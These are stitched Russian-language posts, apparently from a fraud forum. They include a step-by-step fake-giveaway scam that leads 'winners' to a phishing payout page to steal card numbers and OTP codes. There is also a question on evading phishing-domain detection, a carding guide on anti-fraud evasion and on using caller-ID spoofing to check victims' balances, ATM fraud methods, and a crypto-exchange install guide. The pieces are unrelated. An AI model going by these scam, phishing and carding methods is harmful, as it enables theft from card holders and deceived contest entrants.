Конкурс наш может быть как выплатой на карту (банк/сервис который вам нужен) так и на технику(типа айфона, игровой приставки. Таких участников тоже можно в дальнейшем перевести на получение выплаты от нас для последующего перехвата ОТР) Главное, чтобы призовых мест было от 10 и выше. Например конкурс на 50.000$, 10 призовых по 5.000$ каждому.
В конкурсном посте указываем простые правила, написать в ЛС нашему аккаунту инстаграм + подписаться на нас. Дату окончания конкурса, как будет выбираться победитель и.т.д, все нужные детали.
Делаем в любом рандомизаторе запись видео как вы рандомом генерируете 10 чисел или 15, 20 ( смотря сколько у Вас призовых мест), видео сохраняем.
Когда в ЛС начали выписывать после рекламы люди желающие участвовать в конкурсе, скидываем им сертификаты участника, на каждом сертификате должен быть номерок, обязательно выигрышный (сделать можно по скаченному шаблону в MS office или в таких сервисах дизайна как Canva), каждому по очереди кидаем сертификат с выигрышным номером, с 1 по 10 сделанный сертификат или по 15 (смотря скок у вас призовых мест, по кругу кидайте сертификаты с выигрышными номерами, не кидайте всем один и тот же, это снижает конверсию в разы, люди могут быть друзьями/родственниками и.т.д), главное чтобы у всех был выигрышный номер.
Когда реклама прошла и подходит день подведение итогов конкурса (с этим к слову можно не затягивать, если реклама например сегодня, ставьте дату окончания конкурса через 1-2 дня), когда дата подошла - выкладываем пост с заранее записанным видео где вы в рандомизаторе получаете выигрышные номерки.
Люди будут видеть видео выложенное постом, проверять свой сертификат и писать вам, наплыв будет большой и постепенно будет стихать, писать будут и спрашивать как им получить свой выигрыш. Естественно каждый человек будет очень взвинчен и счастлив, что нам и нужно.
Теперь смотрите, если у Вас розыгрыш был на деньги и вам нужно ОТП для банка, делаем заранее фишинг платежки, фишинг якобы на получение выплаты, поля для ввода нужных вам данные + потом поле для ввода смс, якобы для подтверждения зачисления средств. (Я сделал из слитого на просторах сети скрипта, с отправкой данных в бота ТГ, просто переделал на нужные мне данные, вместо сбора скриптом карты+дата+цвв+смс я оставил карту+добавил телефон и после нажатия жертвой кнопки «получить выплату» я брал его карту+номер, вбивал в приложение нужного мне банка для входа и ждал пока жертва на фишинге введет ОТР)
Выглядело получение логов с фиша как-то так.
А потом код
С конкурсом на технику или что-то еще немного дольше и более забеывает из-за
необходимого общения с большим кол-вом людей которые пишут.
Как сделать - сообщайте людям, что они должны оплатить большую сумму
налога/таможни/доставки и оплату нужно делать заранее. Абсолютно все будут
возмущаться, говорить, что вы мошенник или сразу будут спрашивать можно ли
вместо приза перечислить его стоимость им на банк/карту, соглашаемся вместо
приза отправить его стоимость победителям, говорим, что выплатить можем на
сервис/банк который вам требуется и заранее соответственно готовим фишинг под
это дело.
Вот собственно и все. Также в теории эту схему с трафиком и фишингом на ОТР можно использовать для сбора СС но я так не делал и хз какой конверт будет вообще. Хотя вру, по приколу в ручную у 5-7 человек просил фулл данные карты для выплаты, мне двое скинули помню из этих 5-7))
Надеюсь вышло интересно и главное полезно и по правилам конкурса, спасибо тем, кто дочитал хоть один из примеров до конца. Я конечно не топовый скамер или соц.инженер но постарался, описал то, что использовал сам и заработал на этом неплохо. Всем опыта, профита, счастья. И да, если где-то ошибки или задумался и написал какую-то инфу дважды в одном абзаце или еще что-то такое - заранее извиняюсь, перед публикацией глазами пробежался, пару моментов исправил но наверное не всё.
вопрос, как бороться с детектами фишинга от гугла(gsb) и не только, кроме как антибота, клоаки и обфускации скриптов и хтмл?
например есть красивый домен, на котором стоит фиш банка какой то страны (не
юса) а так же клоака, антибот, клаудфлаер(?), обфуксация, вайт + с
непостоянным онлайном.
как сделать, что бы домен жил долго и счастливо без алертов и делегирования
как можно дольше?
Увидел тему тут на форуме, человек искал скрипты фишинг проектов, поэтому
подумал почему бы мне не выгрузить то чем сам не пользуюсь.
То что выгружаю писал довольно давно, но скрипты рабочие, просто в основном
без наворотов, не судите строго =)
Так по мере возможности буду выгружать скрипты на свой канал бесплатно:
https://t.me/GB_Phishing
Буду благодарен за реакции в видел лайков за сторания. Всем успехов!
Привет! Угадайте о чём эта тема?
Все кто знает что-то об этом слове, можете сюда даже не смотреть.
Остальным: новички, мимопроходимцы, интересующиеся - стоит прочесть.
Если будет полезно, то скажите - выложу ещё часть.
Вступление
Если вы думаете, что кардинг это сверхприбыльная тема — спешу вас
разочаровать. Данная работа требует больших усилий, отдачи и наработок. Уже
давно прошли времена, когда товары отсылались в любую точку мира. Сейчас это
суровая борьба кардеров, магазинов, банков и держателей карт. Лучше несколько
раз подумать, чем начинать заниматься этим делом. Большие заработки получают
те, кто постоянно работает и имеет давние наработки в теме. Пользователи
преуспевают только благодаря своему опыту, воли и усердности.
Итак, находим селлеров и покупаем у них материал. Далее заходим в онлайн- магазин, находим нужный нам товар в виде телефона или кольца на пол руки, заказываем и оплачиваем купленной картой.
Не все так просто, как может показаться и на каждом этапе нас могут ожидать подводные камни. Один из сложных этапов ― антифрод система. Это такая система, которая пытается определить действительно ли это владелец карты проводит операцию или это очередной аферист. Данная система сравнивает IP-адрес, отпечаток системы, часовой пояс, языки и другие параметры. Например, если какой-то Майкл Смит живёт во Флориде и хочет купить часы, а его IP с России, язык российский и часовой пояс по Москве, то понятно, что никто такой заказ не отправит. Далее нужно подумать о дропах. Заказывать на свой адрес очень большая авантюра. Поэтому нужно искать проверенных дропов, которые также возьмут свой процент. Есть очень много центров приема и отправки посылок, но они уже внесены в большинство черных списков всех популярных шопов. Поэтому так заказать не выйдет. Это еще один важный этап, который требует затрат.
Направления, виды работы
Десять направлений в Кардинге.
Первое направление - вещевуха.
Вещевуха это закуп различных физических вещей за чужой счёт с последующей их продажей. Можно как заказывать товар на себя (естественно не сразу, а через посредника, дропа и т.д.) и продавать самому в своей стране, можно заказывать товар на скупа. Скупы это такие чуваки которые принимают скарженный товар и выплачивают кардеру процент от этого. Плюс этой темы что довольно много бабок здесь крутится, минусы в том что есть доставка и с этим этапом есть разные проблемы. То развернут посылку, то дроп кинет или к нему полиция придёт.
Второе популярное направление это авиа/жд билеты и отели.
Даркнет пестрит объявлениеми об отдыхе за полцены или даже дешевле. На самом деле кардеры просто оплачивают этот отдых чужими бабками) Тема интересная, нюансы там в основном чтобы найти дающий сайт продающий билеты (напрямую вбить на сайте авиакомпании почти нереально) и чтобы платеж не отменили как можно дольше. Риски - крупные.
Третье направление - вбив самому себе.
Суть в том, что ты создаешь какой-то магазин и продаешь там товар и вбиваешь этот же товар и пиздишь деньги пока не пришел чарджбек. Способ интересен cool доходом, около 90 процентов, но велик и риск потратить бабки, т.е. чарджбэк пришел, а деньги снять не успел. И еще это сложная штука в плане реализации, надо грамотно все этапы соединить, иначе ничего не получится.
Четвертое направление – вбив в казино.
Пользователи вбивают баланс в казино и проигрывают в покер самому себе под другим аккаунтом. Это лишь один из примеров, а так вариантов работы с казино много. Плюс в том что тоже cool доход, но и fuckup можно и оставить все бабки в казино. Надо очень хорошо знать как настроить систему для работы, чтобы успешно заниматься подобным.
Пятое направление – вбив е-гифтов.
Плюсы этой темы в высокой доходности и быстроте, не надо fuck с доставкой и дропами, скупают гифты от 50 до 80 процентов. Минус в том, что тема замастурбирована и сами суммы небольшие, а так тема cool!
Шестое - вбив в букмекерские конторы.
Тема очень похожа на казино, только ставим не на карточные комбинации, а на спорт. Но есть много нюансов. Например, в большинстве БК можно вывести деньги только туда, откуда ты пополнял, но есть обходные пути. Сначала с одной карты пополнить, поиграть, со второй карты пополнить и уже туда вывести.
Седьмая тема – вбив в онлайн-игры.
Это покупка за чужой счёт какой-то игровой валюты с дальнейшей её перепродажей на сторонних сайтах, либо ключи какой-то игры, либо игровые предметы. Способов много, тема интересная и высокодоходная.
Восьмая тема – вбив в платежные системы.
В ебей вбивать это тупо, тем более акки от нее легко найти с балансом, но есть незабитые системы в которые можно вбивать с карты и уже оттуда тратить или переводить средства. Сюда же можно отнести вбив мобильных операторов, откуда деньги в дальнейшем выводятся на другие платежные системы.
Девятое направление – банковские заливы.
Это глобальная тема, где крутятся большие финансы. Этим как правило занимаются те кто имеют свои ботнеты, т.е. сеть зараженных чужих устройств в своём подчинении. Они просто угоняют банковские аккаунты и выводят оттуда средства на левые счета, после чего отмывают и забирают себе. Плюс в том что денег там много, а минус в том, что надо серьезно вложиться, чтобы войти.
Ну и последняя, десятая тема - кардинг в реале.
Успешные игроки с колодой в 52, берут данные о карточках и делают их копии, а дальше снимают средства в банкомате или закупаются в магазинах. Плюсы в высокой доходности, т.к. при таких условиях можно взять деньги с карты под ноль. Минусы в том, что нужны затраты на оборудование и знание как работать с ним, чтобы получалось делать нормальные копии. А еще, конечно, глобальный минус в том, что высокий риск быть пойманным.
(Направлений в кардинге просто дохера, каждый может найти что-то своё, что я вам и желаю, друзья, если хотите заниматься этой темой)
Настройка системы под вбив
Идеальным вариантом считаю отдельно выделенный ноут с windows 7(eng) +
оплаченная сфера и 911 носки.
Разберем 3 варианта.
1. Впн на основе + 911 на основе + виртуалка (WMware/VirtualBox)
Плюсы:
+ Все собрано в одном месте, не потеряешь не запутаешься
+ Перестаешь боятся "левых глаз". В любой момент копию вирты можно удалить.
+ Доп траты не нужны, потребуется лишь вирта+торрент анг винды
Минусы:
-Некоторые шопы, типа амазона могут палить вирту, что накинет доп фрод очков
-Привыкай к лагам и тормозам, их будет достаточно
-Вопрос удобства, но тут уже лично свой минус
2. Впн+911+Основа + portable browser(firefox/chrome)
Плюсы:
+ Работаешь с основы, никаких лагов никаких просадов и вылетов
+ Очень быстро понимаешь что и где. Врубил носок, вставил куки и вперед.
Минусы:
-В частности тебе придется вырубать WebRTC, т.к. сама суть портабл браузеров - не пускать сайт дальше самого браузера. Сказывается на фроде.
3. Впн на основе+911+основа+сфера
Плюсы:
+ Полная подстройка системы под кх.
Если лог не из стран третьего мира и есть обширный выбор хороших носков, то %
вбива при такой машине подлетает до 90
+Удобство. Все собрано в одном месте, только тут это уже один браузер.
Минусы:
-Как это не грустно,но если ты хочешь работать по вещевухе, то привыкай что какие-то шопы могут палить твою сферу.
-Ценник для новичка будет кусающимся + платишь ты в месяц ,а не разово.
Мерчанты и платёжное поведение
Каждый день мы сталкиваемся с гейтами и мерчантами. Разнообразие и модификации
будоражат голову.
Может случиться такое, что в двух разных шопах будет один и тот же мерч, но,
на разных лицензиях/расширениях или по разному настроен.
Как вы угадываете, какой мерч стоит в шопе? Смотрите исходный код? А может
быть добавляете в корзину и смотрите ее интерфейс? builtwith.com?
Да, по сути своей builtwith может помочь, в случае есть шоп не использует
корзину, скоринг и мерч от разных девелоперов. В противном, он покажет в
заветном окне E-Commerce разработчика корзины. Что ближе, то и будет
светиться. По факту, там может стоять шопифай или пп, а корзина бигкоммерса,
что он и покажет.
Данный мерчант по истине самый продвинутый и жесткий по отношению к фроду.
Из коробки имеет кучу систем визуализированных в админке, оргомную базу
шаблонов для разработки интерфейса, несколько вариантов бесплатных шоппинг
карт + платные, чуеву долину подключаемых скоринг и АФ плагинов именных+от
сторонных разработчиков и третьих мерчантов.
Менеджер шопа или департамент верификации в режиме онлайн получает уведомления
в админке о том, сколько юзеров на данный момент серфят, что каждый из них
смотрит, какие действия производит и все данные юзера.
Начиная от стандартных типа айпи, версия ОС, местолопожение, сервисы и тд,
заканчивая кликами, просматриваемым товаром, временем затраченным на каждое
действие и пр.
В общем, абсолютно ВСЁ, что вы делаете.
В режиме ОНЛАЙН вериф может провести аналитику ваших данных уже на этапе
заполнения.
Например, проверить, были ли ордеры с данного айпи адреса и данных типа аудио
и фингер принтов, расшаренного вебртц и проч, что подменяет Linken Sphere.
В режиме онлайн средства скоринга и АФ рассчитывают ваш рейтинг, давая
графические показатели менеджеру о том, кто находится по ту сторону монитора.
Как правило, не ошибается.
Если учесть, что Shopify это не только абсолютно готовое решение для размещения шопа, котрое работает из коробки не требуя доролнительных вмешатьльств, так еще и самый защищенный поставщик, давайте по пунктам его методы детекта:
1. Проверка е-маил адреса по собственной базе и базе партнерских мерчей на
количество ордеров с рассчетом вероятности фродовой транзакции на основе
прошлых данных. Если ордеров с данной электронной почты нет ни в одном мерче -
это уже минус по скорингу.
2. Проверка расстояния между шиппинг и биллинг адресом.
3. Проверка точного совпадения AVS (Address Verification System) по биллингу
и проверка по блэклистам
4. Скоринг на основе анализа данных, передаваемых браузером на совпадение или
несоответствие.
5. Принадлежность айпи провайдеру стационарного интернета либо мобильного
6. Проверка поведенческой активности в шопе и сопоставление данных с
массивным обьемом информации предоставляемой партнерскими скоринг системами
7. Дистанция между геолокацией айпи, шиппинг и биллинг адресом + геолокацией
из браузера
8. Анализ перехода, глубины и кол-ва кликов.
Как можно представить, это далеко не все возможности и заслуги мерчанта.
Кстати, не совсем верное утвеждение, что шопифи - мерчант.
В более чем 70% это всего лишь поставщик АФ и скоринг решения со своей формой
и шоппинг картой, передающая данные чекаута на гейтвей Authorize.net, который
мы рассмотрим дальше.
Самый легкий в плане вбива мерчант - гейтвей.
Почти не имеет подключаемых решений сторонних разработчиков.
Все, что использует для отсеивания фродовых транзакций:
Остальное, что использует мерчант - нам никак не мешает!
Самое главное и интересное - авторайз моментально списывает бабки с карты
после аппрува, что нам на руку.
Не нужно беспокоиться, есть ли на карте деньги, стоят ли лимити. Если ордер
прошел, значит кэш списан в строну магазина.
Но, расслабляться не стоит. Авторайз может стоять как платежное решение, но
корзина и скоринг могут стоять от шопифи. Так что, не радуйтесь сразу видя
такую бляшку.
Данные мерчанты по своей сути почти одинаковы.
Используют одни и те же решения, отличаются лишь в интерфейсе.
Собственные средства абсолютно не эффективны и на момент декабря 2018 года еще можно встретить маленькие шопы с шаблонным интерфейсом, которые не используют абсолютно никакого скоринга и сторонних решений АФ.
Все, что они могут сделать, так это:
Чек введенной информации в паблик рекордс.
На первый взгляд - ничего сложного.
Но, шопов доверяющих данным поставщикам е-коммерции пересчитать по пальцам
одной руки.
Встроенная поддержка плагинов сторонних разработчиков дает огромный плюс в
работе с данными систмами.
Возвращаясь к шопифи, мы можем применить все параметры детекта к Биг и Ву -
коммерсу.
Зайдя по линку ЛИНКУ вы можете посмотреть все доступные решения для
противостояния фроду.
Эти же плагины без проблем прикручиваются к первому мерчу из нашего топа -
Shopify.
Не буду дублировать методы детекта, так как они идентичны первому варианту.
Собственно, рассмотренных 4 мерчанта самые распостраненные при вбиве в США.
Из всего вышеописанного, хочу подвести небольшой итог.
Не смотря на то, какой мерчант или платежный шлюз используется в шопе, никогда
не пренебрегайте правилами успешного вбива. Вы никогда не знаете наверняка,
скоринг система какого разработчика следит за вами на данный момент.
Если у вас не прошел платеж, но карта 100% валидна - это значит лишь то, что
вы набрали слишком много фродбаллов. За исключением мелкого количества
ситуацией, когда банк просто на просто отклонил транзу или залимитил карту.
НЕВОЗМОЖНО убить карту правильным вбивом так же, как не возможно залимитить ее
(относится к случаю, когда платежное поведение соответствует и на карте
достаточный баланс).
Если после чекаута карта заблокировалась или улетела во фрауд депт, это
значит, что платежный шлюз передал банку информацию о том, что транзакция
фродовая.
В случае, если ордер прошел но позже прилетел кенсл это значит лишь то, что в
данном магазине все заказы верифицируются вручную!
Друзья, а вы знаете, что "пользоваться телефоном" в нашей работе синоним слову
"повысить шансы на успех"?
Покупая подписку на сервис с подменой номера звонящего - вы экономите деньги
на карты и увеличиваете свой профит.
Ходит такое поверие, что можно купить карту самого высокого класса и успешно
вбить часы ролекс за 100.000 долларов.
Пусть даже там будет баланс в 1.000.000 долларов, банк может заблокировать
карту.
Было ли у вас такое, что вбивая на сумму в 1000 долларов - получали отказ на
премиальном уровне карты.
Но, вбив в другое место гифт на 100 долларов - все проходило гладко как по
маслу.
Спрашивается, почему? Там же баланс 10.000
Изначально заострю внимание, что банку и шопу плевать на вас. Им не важно, сколько вам лет, что вы заказываете иксбокс или вертолет на радиоуправлении в свои 90 с хвостиком. Не играет абсолютно никакой роли для шопа, какая сумма заказа. Главное, чтобы были деньги на карте и успешно пройдена авто-ручная верификация + скоринг и АФ.
Что же важно и почему не проходят ордера на высокие суммы? Что делать? Ведь я
купил карту уровня инфинити:
Вместе в картой любого уровня, ты просто ОБЯЗАН пополнить себе аккаунт в
сервисе подмены номера и пробить ссн-доб холдера.
Зачем?
Click to expand...
Звонить в банк перед КАЖДЫМ крупным вбивом.
В подавляющем большинстве крупных и не очень банков, для того, чтобы узнать
баланс и историю последних операций нужно лишь позвонить с биллинг номера и в
тональном режиме набрать номер карты и зип.
В отдельных случаях понадобится ССН и-или ДОБ.
В очень редких случаях понадобится разговор с оператором лично либо
предоставление ответа на секретный вопро или ввод пин-кода.
Звоним по номеру банка, который заблаговременно находим в интернете по запросу
"%bankname% balance check phone number"
Попадаем на автоматизированную систему и следуем инструкциям. Вводим номер
карты и допустим ЗИП код.
Айвиар говорит нам актуальный баланс собственных средств и кредитного
лимита(если есть).
Нажимаем в тональном режиме циферку, к которой привязана история
транзакций(слушаем айвиар).
Тут то мы понимаем, когда нам перечисляют историю трат, что холдер не имеет
транзакций на большие суммы.
Максимально слышим списания в 200-300 долларов за одну транзакцию.
Хоть у нас и не имеется полного понимания картины, так как автоматически
выдается только 5-10-20 последних транз(зависит от банка) но мы все равно
можем предположить, сколько в среднем тратит за месяц холдер.
А это значит, что банк будет автоматически блокировать транзакцию на
единовременную покупку по сумме выше чем
СРЕДНЯЯ месячная трата.
Примерно так.
Естественно, что при сумме списаний в 1000 долларов за месяц небольшими
транзакциями по карте холдера - банк просто на просто не даст вам сделать
единовременную покупку на сумму в несколько раз превышающую.
Это не типичное платежное поведение, подозрение на фрод. Среднестатистический
холдер позвонит в банк и предупредит о такой большой оплате.
В лучшем случае, банк просто откажет вам в оплате и шлюз даст деклайн.
В худшем карта улетит во фрод (можно вытащить) либо заблокируется с
принудительным перевыпуском.
Самые популярные способы воровства с кредитных карт
Способ первый
Зачастую мошенники используют устройства, которые, будучи установлены на
банкомате, помогают им получить сведения о карточке. Это могут быть
установленные на клавиатуры специальные "насадки", которые внешне повторяют
оригинальные кнопки. В таком случае владелец карты снимает деньги со счета без
всяких проблем, но при этом поддельная клавиатура запоминает все нажатые
клавиши - естественно, в том числе и пин-код.
Совет: внимательно изучите клавиатуру незнакомого банкомата, прежде чем снять
деньги со счета.
Способ второй
Другое устройство - то, что англичане еще называют lebanese loops.
Это пластиковые конверты, размер которых немного больше размера карточки, - их
закладывают в щель банкомата. Хозяин кредитки пытается снять деньги, но
банкомат не может прочитать данные с магнитной полосы. К тому же из-за
конструкции конверта вернуть карту не получается. В это время подходит
злоумышленник и говорит, что буквально день назад с ним "случилось то же
самое". Чтобы вернуть карту, надо просто ввести пин-код и нажать два раза на
Cancel.
Владелец карточки пробует, и, конечно же, ничего не получается. Он решает, что
карточка осталась в банкомате, и уходит, чтобы связаться с банком. Мошенник же
спокойно достает кредитку вместе с конвертом при помощи нехитрых подручных
средств. Пин-код он уже знает - владелец (теперь уже бывший) "пластика" сам
его ввел в присутствии афериста. Вору остается только снять деньги со счета.
Способ третий
Технически сложно, но можно перехватить данные, которые банкомат отправляет в
банк, дабы удостовериться в наличии запрашиваемой суммы денег на счету. Для
этого мошенникам надо подключиться к соответствующему кабелю и считать
необходимые данные.
Учитывая, что в Интернете соответствующие инструкции легко обнаружить в
свободном доступе, а технический прогресс не стоит на месте, можно утверждать:
такой вариант будет встречаться все чаще.
Способ четвертый
Для того чтобы узнать пин-код, некоторые аферисты оставляют неподалеку
миниатюрную видеокамеру.
Сами же они в это время находятся в ближайшем автомобиле с ноутбуком, на
экране которого видны вводимые владельцем карты цифры. Вводя пин-код,
прикрывайте клавиатуру свободной рукой.
Способ пятый
Дорогостоящий, но верный на все сто способ.
Бывают случаи, когда мошенники ставят в людном месте свой собственный
"банкомат". Он, правда, почему-то не работает и, естественно, никаких денег не
выдает. Зато успешно считывает с карточки все необходимые данные.
А потом выясняется, что вы вчера уже сняли все деньги со счета и почему-то не
хотите этого вспомнить!
Способ шестой
В свое время мошенники из ОАЭ устанавливали в отверстия для кредиток специальные устройства, которые запоминали все данные о вставленной в банкомат карте. Злоумышленникам оставалось только подсмотреть пин-код либо вышеописанными способами первым и четвертым, либо банально подглядывая из-за плеча. Ну, понравилось местному аборигену ваше кольцо, или ваши часы, или что- то там еще...
Способ седьмой
Бороться с ним нельзя. Можно лишь смириться. Здесь уже ничто не зависит от вашей внимательности, осторожности или предусмотрительности. Бывает, что в сговор с мошенниками вступают те люди, которым добраться до ваших кредиток и так очень просто: служащие банков, например. Это случается очень редко, но от таких случаев не застрахован никто.
Повторяюсь, если данная тема покажется полезной, напишите об этом и я выложу ещё.
Нам понадобится сервер примерно следующей конфигурации Intel Xeon E3-1275 v5 | 64 GB RAM DDR4 | 2 x 480 GB SSD | 1 Gbit с установленной CentOS 7
Разворачивать мы будем эту опенсорс биржу https://github.com/xunibidev/CoinExchange (про версия продается за деньги не удалось связаться с продавцом для покупки, а было реальное желание и средства...)
Я делал все в виртуалке выделил 8 ядер, 16 Гб (могу себе позволить ? )
Установка и настройка серверной инфраструктуры.
За основу взято руководство
https://github.com/xunibidev/CoinExchange/tree/master/09_DOC
1. Развертывание сервера
Действия выполняются на сервере с CentOS 7 x64.
Обновляем систему:
yum install net-tools gcc g++ epel-release maven nginx git wget
Установка MySQL.
Устанавливаем MariaDB:
По умолчанию в CentOS 7 используется MariaDB 5.5
Для изменения версии MariaDB производим следующие действия:
Создадим файл /etc/yum.repos.d/mariadb.repo :
Открываем файл /etc/yum.repos.d/mariadb.repo в любом редакторе ( vi, nano, mcedit ) и добавляем в него следующие строки:
[mariadb]
name = MariaDB
baseurl = http://yum.mariadb.org/10.5/centos7-amd64
gpgkey=https://yum.mariadb.org/RPM-GPG-KEY-MariaDB
gpgcheck=1
Сохраняем изменения и в командной строке выполняем:
Проверяем версию MariaDB:
Скачиваем скрипт для создания таблиц в базе данных: https://raw.githubusercontent.com/xunibidev/CoinExchange/master/00_framework/sql/bizzan.sql или https://sysad.su/wp-content/uploads/2021/03/bizzan.sql_.txt
https://raw.githubusercontent.com/xunibidev/CoinExchange/master/00_framework/sql/bizzan.sql
Заходим в консоль MySQL:
Создаём базу данных bitrade:
mysql> create database if not exists bitrade default character set = 'utf8';
mysql> use bitrade;
Создаём пользователя:
mysql> CREATE USER 'bitrade'@'localhost' IDENTIFIED BY 'bitrade';
mysql> GRANT ALL PRIVILEGES ON bitrade.* TO 'bitrade'@'localhost';
Выполняем скрипт для создания таблиц в базе данных:
mysql> source bizzan.sql;
Установка Redis 6.2 ( рекомендуется ставить из рапозитория, см.ниже )
В файл /etc/sysctl.conf добавляем опцию vm.overcommit_memory = 1 и выполняем:
Попробовать установку Redis через epel.
После завершения компиляции в каталоге src находятся три исполняемых файла redis-server,redis-benchmark,redis-cli, в текущем каталоге находится конфигурационный файл redis.conf
Стартуем Redis:
./redis-server redis.conf &
Проверяем:
Проверяем с помощью клиента:
127.0.0.1:6379> set foo bar
OK
127.0.0.1:6379> get foo
"bar"
Устанавливаем пароль, для этого вносим изменения в файл redis.conf:
requirepass pass1234
Для включения удалённого доступа требуется изменить опции:
bind 127.0.0.1
и
protected-mode no
Вариант 2. Установка Redis из репозитория.
Устанавливаем пароль, для этого вносим изменения в файл /etc/redis.conf:
requirepass pass1234
Проверяем:
Проверяем с помощью клиента:
127.0.0.1:6379> auth pass1234
127.0.0.1:6379> set foo bar
OK
127.0.0.1:6379> get foo
"bar"
Установка Kafka
Конфигурирование Kafka
В каталоге /opt/kafka/config вносим изменения в server.properties
#broker.id=0
listeners = PLAINTEXT://localhost:9092
advertised.listeners=PLAINTEXT://localhost:9092
num.network.threads=3
num.io.threads=8
socket.send.buffer.bytes=102400
socket.receive.buffer.bytes=102400
socket.request.max.bytes=104857600
log.dirs=/opt/kafka/logs
num.partitions=1
num.recovery.threads.per.data.dir=1
log.retention.hours=168
log.segment.bytes=1073741824
log.retention.check.interval.ms=300000
zookeeper.connect=localhost:2181
zookeeper.connection.timeout.ms=6000
В каталоге /opt/kafka/config вносим изменения в zookeeper.propertiess
dataDir=/opt/kafka/data
Запуск:
/opt/kafka/config/zookeeper.properties
/opt/kafka/config/server.properties
Проверка работоспособности.
В одной консоли сервера запускаем:
--topic test
Во второй консоли:
--topic test
При наборе символов в первой консоли во второй будут отображаться введённые символы.
Настройка запуска через systemd.
Создаём файл для запуска zookeeper:
В файл добавляем строки:
[Unit]
Requires=network.target remote-fs.target
After=network.target remote-fs.target
[Service]
Type=simple
User=kafka
ExecStart=/opt/kafka/bin/zookeeper-server-start.sh
/opt/kafka/config/zookeeper.properties
ExecStop=/opt/kafka/bin/zookeeper-server-stop.sh
Restart=on-abnormal
[Install]
WantedBy=multi-user.target
Создаём файл для запуска kafka:
В файл добавляем строки:
[Unit]
Requires=zookeeper.service
After=zookeeper.service
[Service]
Type=simple
User=kafka
ExecStart=/bin/sh -c ‘/home/kafka/kafka/bin/kafka-server-start.sh
/home/kafka/kafka/config/server.properties > /home/kafka/kafka/kafka.log 2>&1’
ExecStop=/home/kafka/kafka/bin/kafka-server-stop.sh
Restart=on-abnormal
[Install]
WantedBy=multi-user.target
Установка MongoDB
Подключаем репозиторий MongoDB:
В файл добавляем строки:
[mongodb-org-4.4]
name=MongoDB Repository
baseurl=https://repo.mongodb.org/yum/redhat/7/mongodb-org/4.4/x86_64/
gpgcheck=1
enabled=1
gpgkey=https://www.mongodb.org/static/pgp/server-4.4.asc
Устанавливаем MongoDB:
Запуск MongoDB:
Каталог с базами /var/lib/mongodb
Лог-файлы /var/log/mongodb
Создание пользователя и подключение.
Подключаемся в MongoDB и переключаемся на базу admin:
use admin
Создаём пользователя admin:
db.createUser( {user: "admin",pwd: "123456",roles: [ { role: "userAdminAnyDatabase", db: "admin" } ]})
После добавления пользователей вы можете использовать show users или db.система.users.find () просмотр существующих пользователей.
Выходим из оболочки MongoDB и повторно подключаемся:
use admin
db.auth("admin","123456")
Создаём нового пользователя:
use bitrade
db.createUser({user: "root",pwd: "root",roles: [{ role: "readWrite", db: "bitrade" }]})
Разлогиниваемся из MongoDB и проверяем:
use bitrade
db.auth("root","root")
show collections
2. Настройка Web Front и Web Admin
Веб-интерфейс написан на NodeJS, для работы требуется установка на сервер соответствующего ПО.
Устанавливаем NVM (Node Version Manager):
Перелогиниваемся в консоль и проверяем версию NVM:
Проверяем доступные версии Node:
Нам требуется версия NodeJS — 9.11.2
Проверяем установленные версии:
На этом этапе клонируем проект CoinExchange с git.com в локальный каталог:
Создаём рабочие каталоги:
Копируем проекты в рабочие каталоги:
Устанавливаем зависимости:
В пакетах 04_Web_Admin и 05_Web_Front есть ошибки, связанные с неправильным
регистром в названиях файлов проекта. Поэтом при сборке проектов возникают
ошибки (около десятка в каждом).
Сообщения об ошибках выводится в таком виде:
ERROR in ./src/router/router.js
Module not found: Error: Can't resolve '@/views/otc/OrderManage.vue' in
'/opt/www/admin/src/router'
Находим в /opt/www/admin/src/views/otc/ файл OrderManage.vue , там он прописан
с маленькой буквы оrderManage.vue . Для исправления ошибки переименовываем
файл в оrderManage.vue или в /opt/www/admin/src/router/router.js находим
включение файла в проект:
{ id: 77, path: 'orderManage', icon: 'document', component: resolve => {
require(['@/views/otc/OrderManage.vue'], resolve) } },
и заменяем OrderManage.vue на orderManage.vue
Данное действие выполняем для каждой ошибки 04_Web_Admin и 05_Web_Front
Для того, чтобы к проекту можно было обращаться снаружи в файлах конфигурации
требуется прописать реальное имя хоста.
В /opt/www/admin/build/webpack.dev.config.js изменяем 127.0.0.1 на имя хоста.
В /opt/www/web/config/index.js изменяем 127.0.0.1 на имя хоста.
Сборка проектов:
Запуск проектов:
--inline --progress --config build/webpack.dev.conf.js &
server --content-base ./ --open --inline --hot --compress --config build/webpack.dev.config.js &
Доступ в админку: ИмяХоста:9576
Доступ к веб-интерфейсу: ИмяХоста:8080
Часть 3. Установка и настройка Framework.
Нужна виртуальная машину с установленной CentOS 6.9
Устанавливаем сборщик maven:
Копируем исходный код
Переходим в папку CoinExchange/00_framework/config
И редактируем application-prod.properties (вбиваем туда свои пароли и названия
баз данных которые создали)
Компиляция проекта:
Сборка jar:
mvn package -Pprod
Копируем все jar файлы из поддиректорий с виртуальной машины на сервер
Запускаем:
nohup java -jar /web/app/cloud.jar >/dev/null 2>&1 &
nohup java -jar /web/app/exchange.jar >/dev/null 2>&1 &
nohup java -jar /web/app/market.jar >/dev/null 2>&1 &
nohup java -jar /web/app/exchange-api.jar >/dev/null 2>&1 &
nohup java -jar /web/app/ucenter-api.jar >/dev/null 2>&1 &
nohup java -jar /web/app/otc-api.jar >/dev/null 2>&1 &
nohup java -jar /web/app/chat.jar >/dev/null 2>&1 &
nohup java -jar /web/app/wallet.jar >/dev/null 2>&1 &
nohup java -jar /web/app/admin.jar >/dev/null 2>&1 &
Готово.
На кракозябры у меня в админке не обращаем внимания это нормально) Так как по дефолту админка на китайском, позже напишу правки как включить инглиш и мануал как оредактировать лендинг и придать ему немного другой вид + убрать сообщение о том что для покупки про версии нужно писать в QQ автору.
Сори за капс, это важно.
КТО ЗНАЕТ КАК УСТАНОВИТЬ ЭТО ГОВНО (мессенеджер QQ) БЕЗ КИТАЙСКОГО НОМЕРА И
ЕСТЬ ЛИ ТАМ ПРИЛЫ С ИНГЛИШ ИНТЕРФЕЙСОМ ЧИРКАНИТЕ ПЛИЗ А ТО АВТОР ПО МЫЛУ
ИГНОРИТ, А Я БЫ МОЖЕТ КУПИЛ ПРО ВЕРСИЮ И В ПАБЛИК СЛИЛ СЮДА.
Позже вставлю ссылку на готовый настроенный образ виртуалки.
Ссылку на полностью настроенную биржу дам позже. Переходите, регистрируйтесь
закидывайте битки и побольше у нас выгодные курсы ?
(шутка разумеется)
Предисловие автора
